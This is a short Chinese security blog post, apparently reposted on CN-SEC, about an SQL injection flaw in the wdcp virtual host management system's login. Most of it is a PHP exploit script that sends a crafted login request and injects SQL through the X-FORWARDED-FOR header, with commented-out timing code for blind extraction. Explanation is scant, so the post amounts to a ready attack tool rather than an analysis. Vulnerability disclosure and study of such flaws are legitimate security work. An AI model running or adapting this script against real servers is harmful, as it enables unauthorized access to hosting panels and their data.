wdcp虚拟主机管理系统注入漏洞

没穿底裤 2019年12月31日19:44:25评论1,685 views字数 78阅读0分15秒阅读模式
摘要

wdcp服务器/虚拟主机管理系统登陆框注入漏洞。passwd字段存在注入风险,选择限制字符长度为30.

wdcp服务器/虚拟主机管理系统登陆框注入漏洞。

passwd字段存在注入风险,选择限制字符长度为30.
wdcp虚拟主机管理系统注入漏洞

后来在伟大娃娃给出了一枚辅助脚本
[php]
$id=$_GET["id"];
//$id2=$_GET["id2"];
$post_data = 'username=admin&passwd=bbbbbb/&Submit_login=aaaassss';
$url='http://0day5.com:8080/';
$starttime = time();
$ch = curl_init();
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL,$url);
//curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: ,('.$id.'),char(65),1) #'));
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
ob_start();
curl_exec($ch);
$result = ob_get_contents() ;
ob_end_clean();
$endtime = time();
/*
if($endtime-$starttime>=3){

exit($id." is ".chr($id2));
}*/
echo $result;
?>
[/php]
wdcp虚拟主机管理系统注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日19:44:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   wdcp虚拟主机管理系统注入漏洞http://cn-sec.com/archives/75513.html

发表评论

匿名网友 填写信息